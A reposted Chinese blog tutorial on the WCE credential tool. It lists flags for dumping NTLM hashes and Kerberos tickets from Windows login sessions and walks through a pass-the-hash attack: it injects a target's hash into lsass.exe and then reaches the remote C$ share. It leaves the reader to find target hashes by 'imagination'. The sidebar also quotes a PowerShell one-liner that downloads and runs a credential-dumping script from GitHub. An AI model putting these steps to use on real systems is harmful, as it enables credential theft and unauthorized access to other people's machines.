WCE Windows hash抓取工具 教程

最新推荐文章于 2024-03-11 17:14:12 发布
最新推荐文章于 2024-03-11 17:14:12 发布
阅读量6.9k 收藏 3
点赞数 1
分类专栏: Tools 文章标签: web安全工具使用

WCE 下载地址:链接:My 微云
工具界面
1.通过cmd命令打开,输入 cd wce所在目录,进入wce界面
在这里插入图片描述
2.wce.exe -l 列出登录的会话和NTLM凭据(默认值)
在这里插入图片描述
3.wce.exe -g 生成LM和NT的哈希 参数<密码>
在这里插入图片描述
4.
wce.exe --s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
在这里插入图片描述
5.
-l 列出登录的会话和NTLM凭据(默认值)
-s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
-r 不定期的列出登录的会话和NTLM凭据,如果找到新的会话,那么每5秒重新列出一次
-c 用一个特殊的NTML凭据运行一个新的会话 参数:
-e 不定期的列出登录的会话和NTLM凭据,当产生一个登录事件的时候重新列出一次
-o 保存所有的输出到一个文件 参数:<文件名>
-i 指定一个LUID代替使用当前登录会话 参数:
-d 从登录会话中删除NTLM凭据 参数:
-a 使用地址 参数: <地址>
-f 强制使用安全模式
-g 生成LM和NT的哈希 参数<密码>
-K 缓存kerberos票据到一个文件(unix和windows wce格式)
-k 从一个文件中读取kerberos票据并插入到windows缓存中
-w 通过摘要式认证缓存一个明文的密码
-v 详细输出

#6.
-s参数可以用来hash注入。
hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了。hash注入本身是为了对付那些破解不了的NTHASH。
具体的命令格式如下:
wce.exe -s 用户名:对方机器名或者ip:LM-HASH:NT-HASH
当提示注入成功的时候,这时候键入net use命令并没有看到有连接,其实已经可以连接了,直接使用ipc命令操作对方的机器就可以了。dir \ip地址\c$
其次域里的域用户hash也可以使用wce进行注入,只需要把命令格式变一变就行
wce.exe -s 用户名:域名:LM-HASH:NT-HASH
~~转载于网络

mh_26688
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wce v1.3.zip
11-24
Windows Credentials Editor (WCE)是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。 支持平台: Windows XP, 2003, Vista, 7 和2008 (未对Vista进行实际测试,但应该支持)。 Windows Credentials Editor 已经更新至1.3 beta版,新版本主要改变: Bug fixes Extended support to obtain NTLM hashes without code injection Added feature to dump login cleartext passwords stored by the Digest Authentication package
wce.exehash,
06-23
wce64位,支持windows server 2008 r2 不过赛门铁克
推荐一个开源的文件哈希工具 FileMD5Hash
最新发布
gitblog_00006的博客
03-11 449
推荐一个开源的文件哈希工具 FileMD5Hash 如果你经常需要计算文件的 MD5 或 SHA-1 哈希值,那么你需要一个方便、快速且可靠的工具。这就是我今天要向你推荐的开源项目 FileMD5Hash。 什么是 FileMD5Hash? FileMD5Hash 是一款用于计算文件 MD5 和 SHA-1 哈希值的命令行工具。它由 Java 编写,可以在 Windows、Linux 和 macO...
WCE注入工具
05-24
WIN 2008环境下,用WCE获取管理员密码
服务器读取账号密码,WIN服务器得明文密码神器 mimikatz、WCE
weixin_31621945的博客
07-29 1156
一、mimikatz(自己亲试,可以在win7 x64下使用)昨天有朋友发了个法国佬写的神器叫mimikatz让我们看下还有一篇用这个神器直接从 lsass.exe里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass自己...
WordPress 所有的 Dashicons 和其 CSS Class 以及 CODE
06-03 2万+
http://blog.wpjam.com/m/wordpress-dashicons-list/ dashicons.css @font-face { font-family: "dashicons"; src: url(../fonts/dashicons.eot); } @font-face { font-family: "dashicons"; src: url
HASH注入工具WCE
收集盒 Book box
06-21 2067
http://www.ampliasecurity.com/research.html http://www.ampliasecurity.com/research/wcefaq.html 【list NTLM credentials in memory】 wce.exe wce.exe -o output.txt 【d
jdk8 linux 32位 安装包 微云网盘下载
yijuanxia
06-24 6907
jdk8 linux 32位 安装包 微云网盘下载 链接:https://share.weiyun.com/DwQoPjV0 密码:sbvrfd
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2149
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
share.weiyun.com 微云无法打开 解决办法
热门推荐
V_admin的博客
08-23 8万+
微云无法打开,解决办法。
wce.exe getpass.exe 读取密码
weixin_30808693的博客
04-17 1410
http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip 参数解...
wce_v1_3beta_x64
01-07
wce_v1_3beta_x64 WCE 支持64位 不用多介绍了吧
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
wce Windows hash抓取工具教程
09-19
wce Windows hash抓取工具 提权 Widnows7以下可以直接抓取系统明文 含有32和64位
WCE 抓取工具 hash
06-02
WCE
Wce.rar_WCE
09-21
是关于CE下开发的文档,是无极论坛整理出来的资料.有很多CE下开发的经验
WCE——截图好工具
02-27
轻松实现WCE下的截图工作 放松,由它来做,想截图就点,易用
HASH工具合集
11-04
HASH工具合集:getpass,wce,mimikatz,Pwdump7,QuarksPwDump_v0.1,SAMInside
web基础
dianziagen的博客
05-20 3万+
web基础,css基础,js基础
hash-test-vectors
12-24
hash-test-vectors是一种用于测试哈希算法的数据集合,通常包含一些预先计算好的输入和对应的哈希输出。这些测试向量可以用来验证哈希算法的正确性和性能。 通常,hash-test-vectors包括了一系列不同长度和内容的输入数据,以及它们的哈希值。通过对这些数据进行哈希计算,并将结果与预先计算好的哈希值进行比较,可以验证哈希算法在各种情况下的正确性。这包括了边界条件、异常情况和特殊情况。 哈希测试向量还可以用于评估不同哈希算法的性能。通过使用相同的输入数据,可以比较不同哈希算法的计算速度和生成的哈希值长度,从而评估它们的性能。 除了对哈希算法进行验证和性能评估之外,hash-test-vectors还可以用于教学和研究。通过使用这些测试向量,可以帮助学生理解哈希算法的原理和计算过程,同时也可以为研究人员提供一个统一的测试数据集,用于比较和验证他们的研究成果。 总之,hash-test-vectors是一种非常有用的工具,可以用于测试、验证和评估哈希算法的正确性和性能,同时也可以用于教学和研究。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值